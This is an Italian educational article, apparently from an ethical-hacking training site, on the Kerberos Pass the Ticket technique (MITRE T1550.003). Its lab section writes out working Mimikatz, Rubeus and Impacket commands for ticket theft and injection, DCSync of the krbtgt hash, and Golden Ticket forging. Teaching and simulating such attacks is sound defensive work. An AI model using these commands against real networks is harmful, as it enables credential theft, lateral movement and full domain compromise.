Pass the Ticket: Use Alternate Authentication Material – Pass the Ticket (T1550.003)

Pass the Ticket è una tecnica di abuso del protocollo Kerberos che consente a un attaccante di autenticarsi su sistemi remoti utilizzando ticket rubati, senza mai conoscere la password dell'account vittima. Il meccanismo è semplice nella sua logica: se possiedi un Ticket Granting Ticket (TGT) valido, puoi richiedere Service Ticket per qualsiasi risorsa a cui l'utente ha accesso; se possiedi un Service Ticket specifico, puoi accedere direttamente alla risorsa corrispondente.

La tecnica si colloca in due tattiche distinte. Nella fase di Defense Evasion (TA0005), l'attaccante elude i controlli di accesso tradizionali perché non genera eventi di autenticazione classici basati su password. Nella fase di Lateral Movement (TA0008), i ticket rubati diventano il vettore per spostarsi lateralmente attraverso la rete, raggiungendo sistemi critici come file server, SharePoint e domain controller.

Due varianti meritano attenzione particolare. Il Golden Ticket sfrutta l'hash NTLM dell'account KRBTGT per forgiare TGT arbitrari, garantendo accesso virtualmente illimitato al dominio Active Directory. Il Silver Ticket prende di mira singoli servizi, generando ticket validi per risorse specifiche. Una terza variante, nota come overpass-the-hash, combina Pass the Hash con la creazione di ticket Kerberos legittimi, rendendo il traffico di rete indistinguibile da un'autenticazione normale. Tre gruppi APT documentati, 3 software e 4 mitigazioni compongono il panorama di questa tecnica.


La simulazione di Pass the Ticket in laboratorio richiede un ambiente Active Directory controllato con almeno un domain controller e una workstation unita al dominio. Il flusso operativo si articola in tre fasi: estrazione dei ticket, iniezione in memoria e accesso laterale.

Fase 1 — Estrazione dei ticket dalla memoria. Con Mimikatz (open source), il modulo sekurlsa consente di esportare tutti i ticket Kerberos presenti nella sessione corrente:

mimikatz # privilege::debug mimikatz # sekurlsa::tickets /export

Questo comando produce file .kirbi nella directory corrente, uno per ogni ticket in cache. In alternativa, Rubeus (open source) offre un approccio più chirurgico per estrarre i TGT dalla memoria LSASS:

Rubeus.exe dump /luid:0x3e7 /nowrap

Il parametro /luid consente di mirare a una specifica sessione di logon, mentre /nowrap produce output base64 su una singola riga, comodo per il copia-incolla in ambienti senza file transfer.

Fase 2 — Iniezione del ticket. Una volta ottenuto il file .kirbi o la stringa base64, l'attaccante lo inietta nella propria sessione. Con Mimikatz:

mimikatz # kerberos::ptt ticket_esportato.kirbi

Con Rubeus, passando direttamente il base64:

Rubeus.exe ptt /ticket:<base64_del_ticket>

Su sistemi Linux, Impacket (open source) offre strumenti equivalenti. Per ottenere un TGT a partire da un hash NTLM (overpass-the-hash) si usa getTGT.py:

getTGT.py -hashes :hash_ntlm dominio/utente

Il ticket viene salvato in formato .ccache. Per utilizzarlo, basta impostare la variabile d'ambiente:

export KRB5CCNAME=utente.ccache

A quel punto, qualsiasi tool Impacket può operare con autenticazione Kerberos aggiungendo il flag -k -no-pass, ad esempio:

psexec.py -k -no-pass dominio/utente@target_hostname

Fase 3 — Golden e Silver Ticket. Per simulare un Golden Ticket, serve prima l'hash NTLM dell'account KRBTGT, ottenibile tramite DCSync:

mimikatz # lsadump::dcsync /domain:lab.local /user:krbtgt

Poi si forgia il TGT:

mimikatz # kerberos::golden /user:Administrator /domain:lab.local /sid:S-1-5-21-... /krbtgt:<hash_ntlm> /ptt

Il flag /ptt inietta immediatamente il ticket in sessione. Per un Silver Ticket la logica è analoga, ma si usa l'hash dell'account di servizio e si specifica il servizio target con /service:cifs o /service:http.

Dopo l'iniezione, verifica l'accesso con klist per visualizzare i ticket in cache, poi tenta l'accesso al file system remoto con dir \\server\share per confermare il lateral movement.


Vuoi diventare un Ethical Hacker ma non sai da dove iniziare?

Scarica la guida gratuita e segui il percorso corretto fin dal primo passo

We use cookies

Utilizziamo i cookie sul nostro sito Web. Alcuni di essi sono essenziali per il funzionamento del sito, mentre altri ci aiutano a migliorare questo sito e l'esperienza dell'utente (cookie di tracciamento). Puoi decidere tu stesso se consentire o meno i cookie. Ti preghiamo di notare che se li rifiuti, potresti non essere in grado di utilizzare tutte le funzionalità del sito.